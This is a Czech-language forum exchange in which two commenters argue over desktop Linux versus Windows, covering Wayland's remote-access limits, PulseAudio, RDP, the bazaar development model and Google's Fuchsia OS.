Pro uživatele to všechno znamená spoustu komplikací, které se obecně považují za "daň z používání Linuxu". Jenže ono se i UI distribucí mění radikálně a nepředvídatelně. Když Ubuntu přišlo s Unity, byla to den ze dne veliká změna, a Unity bylo ve stavu mizerné alpha verze, ne hotového produktu. Podobně mizerně na tom byly svého času první verze KDE 4. A naprosto nepochopitelně se "za pochodu" mění i umístění "zavírátek" u oken. Jako sorry, ale i velmi hlasitě kritizované změny mezi Win7 a Win8 je proti tomu možné hodnotit jako relativně promyšlené a funkční (byť při hodnocení bez srovnání s Linuxem to byla dost katastrofa).

Nechci končit pesimisticky, ale zdá se mi, že se (nejen) desktopový Linux jako projekt potácí v zásadních problémech, způsobených vývojem ve stylu bazaar. Dost vypovídá i to, že kde se Linux více používá, tam jde především o opis funkcionality tradičních Unixů: spustit server napsaný v C a nechat běžet. Případně použít kernel a použít všechno ostatní vzít odjinud (v případě Androidu drivery a celý runtime včetně libc a Skia).

Ad chaos to je, to se nehadam - jednak mě těší že ten chaos vnímíte (což u řady jiných diskutérů postrádám), a pak musím upřímně ocenit váš nezdolný optimismus.

Ad diky tomu je mozne treba velmi osekany Linux pouzit na nejruznejsich prapodivnych platformach - Na prapodivných platformách můžete technicky běžet třeba Windows, které nakonec běží na všem od Raspberry Pi 2, přes mobily, tablety a desktopy až po servery. Není věc technická. U Linuxu je to spíš o nulové ceně, a o tom že autoři nechají s kódem kohokoliv dělat cokoliv. Což má ten důsledek, že si Linux často vybírají výrobci telefonů (Android), WiFi a ADSL routerů, televizí, set-top boxů apod., a vede to k obrovské bezpečnostní katastrofě, které jsme nyní všichni svědky.

Ad zkus si predstavit, ze se omezis treba na GTK 3, GNOME 3 API, Clutter a Wayland - to bohužel není ekvivalent situace na jiných OS, protože je to ve srovnání s konkurencí pořád dost chudé API. Ale kdyby se opravdu autoři omezili na nějakou podobnou kombinaci, tak by mohli soustředit síly na dopracování chybějící funkcionality a zvýšení spolehlivosti, místo aby ta samá lidská síla vyvíjela polotovary stylem pejska a kočičky.

Ad navic michas zastarale technologie s modernimi (a prave tento postupny vyvoj je diky takove otevrene architekture mozny) - ve Windows 10 spustím aplikaci psanou pro Windows 95, a ve 32-bitových i aplikaci pro Win16 nebo DOS. Bez jakékoliv modifikace.

Ad X11 aplikace mi pres Xwayland funguji az na vyjimky zcela bezproblemu - no právě, ty výjimky.

Ad remote pristup neresil ani X11 - nebylo to zdaleka dokonalé řešení, ale bylo to alespoň něco. Wayland neumí ani to málo. Ohledně Pipewire se nechám překvapit, ale zatím to vypadá, že v nejlepším případě bude umět grabovat obrazovku, a nikoliv dodávat zobrazující straně instrukce ke kreslení obrazu. Jinými slovy to bude stejně mizerné, jako VNC ve srovnání s RDP. Mimochodem tohle je podle Gnome blogu web projektu Pipewire. We are also working now on a proper website for PipeWire, a od června asi nebyl čas ani udělat home page projektu.
https://people.freedesktop.org/~wtay/
Zdroj: https://blogs.gnome.org/uraeus/2017/06/20/fedora-workstation-26-and-beyond/

Zajímavé jsou i postřehy Dereka Foremana (Senior Open Source Developer with Samsung's Open Source Group). File descriptor passing is used extensively in the protocol. ... Obviously you can’t (usefully) pass a file descriptor over the network. ... Keyboard repeat is handled on the client side, so if you have a dodgy network connection and a key press packet arrives but the key release packet is delayed, the client would start repeating keys. ... Buffers are shared between the client and compositor… somehow... Dvacet let snahy o nahrazení X11, a výsledek zjevně nepočítá se vzdáleným přístupem? Existuje vůbec nějaká zadávací dokumentace pro Wayland (přičemž "X11 sux" nepočítám), která by popisovala cílový stav pro prvních pár verzí, a nastiňovala možnosti dalšího rozvoje? Tipnu si, že jako u většiny vývoje stylu bazaar není. Jak jsem psal: pejsek a kočička vaří dort :/
https://blogs.s-osg.org/wow-wayland-over-wire/

Ad clovek to na Linuxu potrebuje mene nez na Windows - to si myslíte, protože ten vzdálený přístup nemáte. Kdybyste ho měli, možná byste měli i kvalitnější admin UI (a nejlépe unifikované, stejně jako command line tools), a stejně jako ve Windows byste neměli důvod se vůbec připojovat přes textovou konzoli. V těch vzácných případech, kdy ta konzole je potřeba, se dá prostě pustit přes RDP. Jenže protože vývoj zamrzl někdy začátkem devadesátých let, tak máte pro administraci systému prakticky výhradně nástroje, které byly k dispozici v té době, a jsou dneska součástí POSIXu.

Ad ALSA vs PulseAudio, v cem je tam problem - třeba v tomhle, doporučuji si přečíst komentáře. Sorry, ale takhle nevypadá kvalitně navržená architektura MM subsystému. Takhle vypadá výsledek toho, když pejsek a kočička vaří dort.
https://bugzilla.mozilla.org/show_bug.cgi?id=1345661

Ad Zde je mnohem vetsi volnost a moznost customizace - což bohužel vede k tomu, že je Linux peklo pro vývojáře, a vysloveně nepřátelský pro uživatele.

Ad se dobre pouzitelny desktop na tom vybudovat da - jenže desktopové prostředí je jen část celé věci. Aby OS pro uživatele fungoval, měl minimum defektů a byl predikovatelný, tak nestačí nahrnout na jednu hromadu to co se tak nějak urodilo, a doufat, že to bude stabilně fungovat. Protože pak vypadá výsledek nějak takhle:
http://www.sliptalk.com/homemade-cars/

Pls neberte to jako hate. Je samozřejmě úžasné, že se amatérům bez jakéhokoliv pokusu o systémovou architekturu podařilo napsat funkční kernel, který je podstatě použitelný, a díky nulové ceně dokonce používaný. A je úžasné, že se poměrně malému počtu lidí s minimální koordinací během let povedlo vytvořit v podstatě funkční desktopové prostředí (byť šlo zpočátku o kopii CDE od HP). Jenže to má své limity. Kernel, libc a utility mají design daný převážně od univerzit a Bell Labs, takže stačí napsat to co popisuje dokumentace a co kdysi učili na školách (tj. klasický unixový monolitický kernel s BKL). Bohužel kde tohle vedení chybí, tam se vývoj rozpadá. Tenhle bazaar pak vede k věčným polotovarům, a ne k hotovým, dotaženým a funkčním produktům. Někdy z toho guláše něco vytáhne komerční firma a něco dalšího na tom postaví, třeba Google. Ale všimněte si, že i ten Google podle všeho zahodí Linux ve prospěch Fuchsia OS.
https://en.wikipedia.org/wiki/Google_Fuchsia

> Ad diky tomu je mozne treba velmi osekany Linux pouzit na nejruznejsich prapodivnych platformach - Na prapodivných platformách můžete technicky běžet třeba Windows, které nakonec běží na všem od Raspberry Pi 2, přes mobily, tablety a desktopy až po servery. Není věc technická. U Linuxu je to spíš o nulové ceně, a o tom že autoři nechají s kódem kohokoliv dělat cokoliv. Což má ten důsledek, že si Linux často vybírají výrobci telefonů (Android), WiFi a ADSL routerů, televizí, set-top boxů apod., a vede to k obrovské bezpečnostní katastrofě, které jsme nyní všichni svědky.

Je to vec technicka, protoze otevrena platforma, kde mohu spoustu veci (resp. temer vse) vymenit mi dava velke technicke moznosti, jak tam dostat prakticky cokoliv na jakekoliv platforme :)

Situace s pristupem vendoru k bezpecnostnim aktualizacim je tristni - bohuzel. Na to nejde moc co rict, proste to tak je :) U Androidu se s verzi 8 situace asi zlepsi, Google to podle vseho chce vzit trochu do vlastnich rukou (coz naprosto chapu, proc nechteli, ale vznika z toho celkem globalni problem - i kdyz je mi to reseni principialne protivne, aby Google resil problem vyrobcu, jinak to bohuzel asi nepujde). Holt se vyrobci Android telefonu chteji degradovat na montovny HW, jejichz nejvetsi inovace je zprasene GUI, aby to nevypadalo stejne jako jiny Android telefon (PROC, PROC tam nenechat ten dobre pouzitelny default??). Skoda. Proto si telefony kupuji od Google, ktery je aktualizuje :)

> Ad zkus si predstavit, ze se omezis treba na GTK 3, GNOME 3 API, Clutter a Wayland - to bohužel není ekvivalent situace na jiných OS, protože je to ve srovnání s konkurencí pořád dost chudé API. Ale kdyby se opravdu autoři omezili na nějakou podobnou kombinaci, tak by mohli soustředit síly na dopracování chybějící funkcionality a zvýšení spolehlivosti, místo aby ta samá lidská síla vyvíjela polotovary stylem pejska a kočičky.

To je klasicky argument katedrala vs bazar. Oboje ma svoje vyhody i nevyhody. Takze o tomhle moc argumentovat nechci, protoze tam se vysledku stejne nedobereme :-)
Ale jen tak treba pro zajimavost, me tahle kombinace chuda neprijde - co ti tam chybi ?

> Ad navic michas zastarale technologie s modernimi (a prave tento postupny vyvoj je diky takove otevrene architekture mozny) - ve Windows 10 spustím aplikaci psanou pro Windows 95, a ve 32-bitových i aplikaci pro Win16 nebo DOS. Bez jakékoliv modifikace.
> Ad X11 aplikace mi pres Xwayland funguji az na vyjimky zcela bezproblemu - no právě, ty výjimky.

No a ty vyjimky najdeme i ve Windows. Dost casto za to muzou spatne napsane aplikace (zprasene).
Ale MS samozrejme na udrzeni zpetne kompatibility musi vynakladat mnohem vetsi usili diky svemu ekosystemu. Linuxovi vendroi ne - poskytuji nejake defaultni DE vetsinou (bavim se ted o necem jako je RHEL), maji pod kontrolou aplikace, ktere se tam budou instalovat, tudiz je mnohem mensi problem. A obecne si nemyslim, ze je nutna 100% kompatibilita GUI aplikaci, staci ze pobezi drtiva vetsina.

> Zajímavé jsou i postřehy Dereka Foremana (Senior Open Source Developer with Samsung's Open Source Group). File descriptor passing is used extensively in the protocol. ... Obviously you can’t (usefully) pass a file descriptor over the network. ... Keyboard repeat is handled on the client side, so if you have a dodgy network connection and a key press packet arrives but the key release packet is delayed, the client would start repeating keys. ... Buffers are shared between the client and compositor… somehow... Dvacet let snahy o nahrazení X11, a výsledek zjevně nepočítá se vzdáleným přístupem? Existuje vůbec nějaká zadávací dokumentace pro Wayland (přičemž "X11 sux" nepočítám), která by popisovala cílový stav pro prvních pár verzí, a nastiňovala možnosti dalšího rozvoje? Tipnu si, že jako u většiny vývoje stylu bazaar není. Jak jsem psal: pejsek a kočička vaří dort :/
https://blogs.s-osg.org/wow-wayland-over-wire/

O designu waylandu se muzes docist zde - https://wayland.freedesktop.org/
To, co pise Derek, je pravda - ale rekl bych, ze to proste moc nepochopil. Wayland byl od pocatku navrzeny jako protokol, ktery nebude sitovy - proto pouziva FD, GPU buffery a dalsi veci, ktere po siti principialne fungovat nebudou a nemohou.

O tom, ze to nebude fungovat dobre bych se mozna i hadal - RDP je v tomhle efektivnejs, to je pravda. Ale dobre fungovat to muze - celkem bezne pouzivam napr. SPICE na KVM hosty, pouzitelne to je bez jakychkoliv vetsich problemu. A pro SPICE existuje i backend pro Weston - takze resitelne to je.

> Ad clovek to na Linuxu potrebuje mene nez na Windows - to si myslíte, protože ten vzdálený přístup nemáte. Kdybyste ho měli, možná byste měli i kvalitnější admin UI (a nejlépe unifikované, stejně jako command line tools), a stejně jako ve Windows byste neměli důvod se vůbec připojovat přes textovou konzoli. V těch vzácných případech, kdy ta konzole je potřeba, se dá prostě pustit přes RDP. Jenže protože vývoj zamrzl někdy začátkem devadesátých let, tak máte pro administraci systému prakticky výhradně nástroje, které byly k dispozici v té době, a jsou dneska součástí POSIXu.

Ja ti teda nevim, ale delam i s Windows Serverem a 99% casu travim v PowerShellu, takze neco klikat v nejakem GUI me nelaka ani na Windows, ani na Linuxu :)
Navic soucasnym trendem je kontejnerizace serveru a jejich orchestrace pomoci nastroju jako je Docker - to pouziti nejakeho admin GUI taky docela vylucuje.

> Ad ALSA vs PulseAudio, v cem je tam problem - třeba v tomhle, doporučuji si přečíst komentáře. Sorry, ale takhle nevypadá kvalitně navržená architektura MM subsystému. Takhle vypadá výsledek toho, když pejsek a kočička vaří dort.
https://bugzilla.mozilla.org/show_bug.cgi?id=1345661

A v cem konkretne ? FF se rozhodnul dropnout podporu pro ALSA only backend, protoze se to tyka velmi maleho mnozstvi uzivatelu spise obskurnich distribuci. Podporovat jen PA je pro ne mnohem jednodussi (a dava to smysl navic). Je to asi na urovni toho, ze by nekdo nadaval nejakemu programu na Windows, ze prestal fungovat, protoze si ze systemu odparal DirectSound a ma jen Core Audio (zde teda kazde to api dela neco jineho - ale je to priklad lowlevel vs high level sound api). Jediny rozdil je, ze na Linuxu to jde a na Windows ne. A protoze to na Linuxu jde, tak holt uzivatele, co neco takoveho udelaji, obcas musi nest nasledky. Muzeme to nazvat dan za svobodu volby :)

Pokud uzivatel pouzije nejakou mainstreamovou distribuci (RHEL napr.), tak tam PA bude, FF funguje atd.
Rekl bych, ze moc nechapes to, ze Linuxovy SW je spise skladacka, lego, ze ktereho si teprve ten OS postavis. A to je presne to, co delaji vendori distribuci (s vetsim, ci mensim uspechem). Nema smysl srovnavat Windows napr. se Slackem ci Arch Linuxem, ale s necim jako je RHEL ci aspon Fedora, kde veci typicky funguji out of the box. A to plati na spoustu dalsich veci, ktere jsi k tomu psal dal.

> Pls neberte to jako hate. Je samozřejmě úžasné, že se amatérům bez jakéhokoliv pokusu o systémovou architekturu podařilo napsat funkční kernel, který je podstatě použitelný, a díky nulové ceně dokonce používaný. A je úžasné, že se poměrně malému počtu lidí s minimální koordinací během let povedlo vytvořit v podstatě funkční desktopové prostředí (byť šlo zpočátku o kopii CDE od HP). Jenže to má své limity. Kernel, libc a utility mají design daný převážně od univerzit a Bell Labs, takže stačí napsat to co popisuje dokumentace a co kdysi učili na školách (tj. klasický unixový monolitický kernel s BKL). Bohužel kde tohle vedení chybí, tam se vývoj rozpadá. Tenhle bazaar pak vede k věčným polotovarům, a ne k hotovým, dotaženým a funkčním produktům. Někdy z toho guláše něco vytáhne komerční firma a něco dalšího na tom postaví, třeba Google. Ale všimněte si, že i ten Google podle všeho zahodí Linux ve prospěch Fuchsia OS.

A o tom to presne je - je to stavebnice, nekdo si z toho neco vezme a udela z toho neco noveho pro sve potreby. Takze diky tomu Android ci ChromeOS stavi na Linuxu, PS4 na FreeBSD atd.
A jestli Google prejde na Fuchsia nebo co z ni vlastne bude - to se uvidi. Popravde, me osobne je to celkem fuk, Android Linuxu jako takovemu nikdy nic moc neprinesl

A je potreba mit z Linuxu desktop pro masy? Vubec ne. Me bohate staci, ze se z SW jeho ekosystemu ten desktop da postavit funkcni (ci specializovany).
Nemyslim si,ze treba RH ci kdokoliv z Linux vendoru, ma snahu srazit dominantu MS na desktopu, naopak si myslim, ze zde mohou ruzne systemy krasne koexistovat a kopirovat od sebe dobre features. A uzivatele si sami vyberou, co budou chtit pouzivat pro jejich use case.

A stejne resit dneska desktop - kdyz vse smeruje k tomu, ze vetsina aplikaci bude bezet v prohlizeci, no nevim ti zda se o tom ma smysl hadat, v ktery bootstrapper pro Chrome/Edge/... uzivatel pouzije :-)

A on si to myslim docela dobre uvedomuje i MS - konec koncu zrovna opravuji zakaznikovu aplikaci na Linuxu v VS Code a cela aplikace mi bezi .NET Core tez na Linuxu :-)

Osobne si myslim, ze jsme na konci masove ery klasickych PC, coz me mrzi i sere. Ale je to vyvoj - stejne jako se z desktopvych aplikaci zacaly stavat pomerne specializovane kusy SW pro specificke skupiny uzivatelu, tak tohle je bohuzel jen pokracovanim tohoto trendu.

Já s dovolením začnu od konce. Google píše Fuchsia OS, a je to jejich pokus o "Windows NT", tedy dobrý OS, který se dá použít všude. Bude podle všeho schopný běžet i aplikace psané pro Android. Google dávno udržuje vlastní kernel oddělený od mainstream Linuxu, a snaží se vyhýbat GPL licenci (proto nepoužívá ani glibc). Tímhle bude proces završený, navíc to vyřeší problém s Javou (vizte soud s Oraclem). Pokud jim to vyjde, čekejte výsledek v produkci tak okolo let 2019-2020.
Co potom zbude z Linuxu? Na desktopu se moc neuchytil, na herní scéně také ne (podíl Linuxu na Steamu setrvale padá, SteamOS je podle všeho mrtvola; BTW ve Valve zakázali pro SteamOS suspend s komentářem "Given the state of hardware and software support throughout the graphics stack on Linux we didn't think we could make this reliable", což také dost vypovídá). Sen o mainstreamovém Linuxu se tedy rozplývá, a s ním asi odejde i spousta "protestních" vývojářů, kteří chtěli "lepší svět bez Microsoftu". Paradoxně budou mít "lepší svět" s Microsoftem, Googlem a Applem :). Telefony pojedou Fuchsia OS (nějakou část si urvou Apple a MS), totéž se dá čekat u set top boxů, televizí, ledniček, a nejspíš dalších domácích krabiček. Takže zbývá server, kde Linux už léta nahrazuje klasické Unixy. K tomu ovšem není potřeba moc desktopové funkcionality, podpory grafiky, power managementu atd. V podstatě postačí kopie Unixů z roku 1990. To zavání tím, že z Linuxu bude něco jako BSD: okrajový systém, který je v principu použitelný na speciality, ale je ztraceně daleko od mainstreamu.
https://github.com/ValveSoftware/SteamOS/issues/259
https://arstechnica.com/gadgets/2017/05/googles-fuchsia-smartphone-os-dumps-linux-has-a-wild-new-ui/

Ad Situace s pristupem vendoru k bezpecnostnim aktualizacim je tristni - ano, ale nový OS může Google licencovat odlišně, a hlavně může daleko lépe oddělit kernel od driverů a RIL, což umožní patchování nezávislé na výrobci telefonu. Stejně to dělají Windows.

Ad Holt se vyrobci Android telefonu chteji degradovat na montovny HW - oni nemají moc jiných možností, protože coby výrobci HW neumí psát SW.

Ad katedrala vs bazar. Oboje ma svoje vyhody i nevyhody - za mě jeden z těch modelů vede k dotaženým produktům, a druhý k dortu z tvarohu, skořice, česneku, kostí a myší :). Samozřejmě existují výjimky na obou stranách.

Ad me tahle kombinace chuda neprijde, co ti tam chybi - namátkou třeba veškará API pro správu systému: změnu IP adresy, přidání/spuště­ní/zastavení služby, přidání uživatele, defragmentaci disku, plánování úloh, přimountování image atd. Navíc tam nevidím ani možnost nastavit souboru ACL. A neřeší 3D kreslicí API, 3D stereoskopický obraz, VR, skenování (WIA), kompresi a dekompresi multimédií, rozeznávání mluveného slova, koordinaci distribuovaných transakcí s třífázovým commitem (MSDTC) a řadu dalších věcí.

Ad MS samozrejme na udrzeni zpetne kompatibility musi vynakladat mnohem vetsi usili diky svemu ekosystemu. Linuxovi vendroi... maji pod kontrolou aplikace - což znamená že aplikace buď máte od vendora připravené pro danou verzi daného distra, nebo máte problém. Pokud vývojář nechce dát svoji aplikace pod GPL a zdarma, tak mu nestačí uvolnit verzi "pro Linux". Musí sám připravit balíček opět pro každou verzi každého distra, přečemž nové verze dister vycházejí ztraceně často. Fragmentovaná plaforma, dokumentace nejrůznějších kvalit, obtížný deployment aplikací, nutnost vyhnout se GPL licenci... To se pak nedivte, že desktopových aplikací je na Linuxu pomálu.

Ad O designu waylandu se muzes docist zde - to je popis architektury (mimochodem dopsaný zpětně, protože když jsem se zajímal před nějakou dobou, tak neexistovalo nic vyjma pár prezentací), nikoliv zadávací dokumentace. SW se nepíše tak že si vývojář sedne a začne psát co ho napadne, s tím že by to nakonec mohlo být dobré. Píše se pro konkrétní skupinu lidí, pro řešení konkrétních potřeb, s požadavkem na konkrétní výsledky. V komerční sféře obyčejně i s nějakým plánováním a rozpočtem :)

Ad Wayland byl od pocatku navrzeny jako protokol, ktery nebude sitovy - pak je kvůli vzdálenému přístupu potřeba dělat rovnák na ohýbák. Nebylo by bývalo lepší se na začátku zamyslet a sepsat zadávací dokumentaci, kde by mimo jiné stálo "musí podporovat vzdálený přístup, ve verzi 1.0 minimálně na úrovni architektury připravené pro tento účel", než udělat ohýbák, a pak vymýšlet jak udělat ten rovnák?

Ad SPICE na KVM hosty, pouzitelne to je bez jakychkoliv vetsich problemu - to ovšem asi používáte na lokální síti. Větší firmy potřebují z Indie jít na server který běží v Buenos Aires, a z Johannesburgu na server který je v Praze. Často z mobilního připojení, přes SSL VPN (nebo v případě RDP přes SSL gateway). RDP s tím nemá problém: vrazíte do telefonu místní SIM (jen šílenec by platil datový roaming), připojíte notebook, a jede to. Není to úplně jako lokální session, ale je to velmi dobře použitelné. Kdyby bylo potřeba přenášet kompletní obraz při každé jeho změně, tak bych člověk brzo hodil mašli. To pak opravdu nezbývá než použít SSH.

Ad smeruje k tomu, ze vetsina aplikaci bude bezet v prohlizeci - pokud myslíte Facebook a Youtube, tak jistě ano. Ale webové aplikace pro práci mi přijdou jako špatný nápad. Umí toho méně než desktopové aplikace pro Windows 3.1 (nedají se ovládat z klávesnice, neumí tisknout, skenovat...), ale zato sežerou GB paměti a spoustu CPU. Za mě tudy ne.

Ad myslim, ze jsme na konci masove ery klasickych PC, coz me mrzi i sere. Ale je to vyvoj; stejne jako se z desktopvych aplikaci zacaly stavat pomerne specializovane kusy SW pro specificke skupiny uzivatelu - souhlas, na poslech hudby, hraní her, sjíždění Facebooku nebo koukání na film opravdu není potřeba desktop. Na práci ale nic lepšího než desktop nemáme, a asi dlouho mít nebudeme. Otázka je, jestli MS uhájí svoji roli na desktopu a serverech, nebo jestli mu ji vezme třeba Google s Fuchsia OS (pokusy o desktop s Androidem tu už jsou). To by bylo dost mizerné, protože Google je dost drsný šmírák.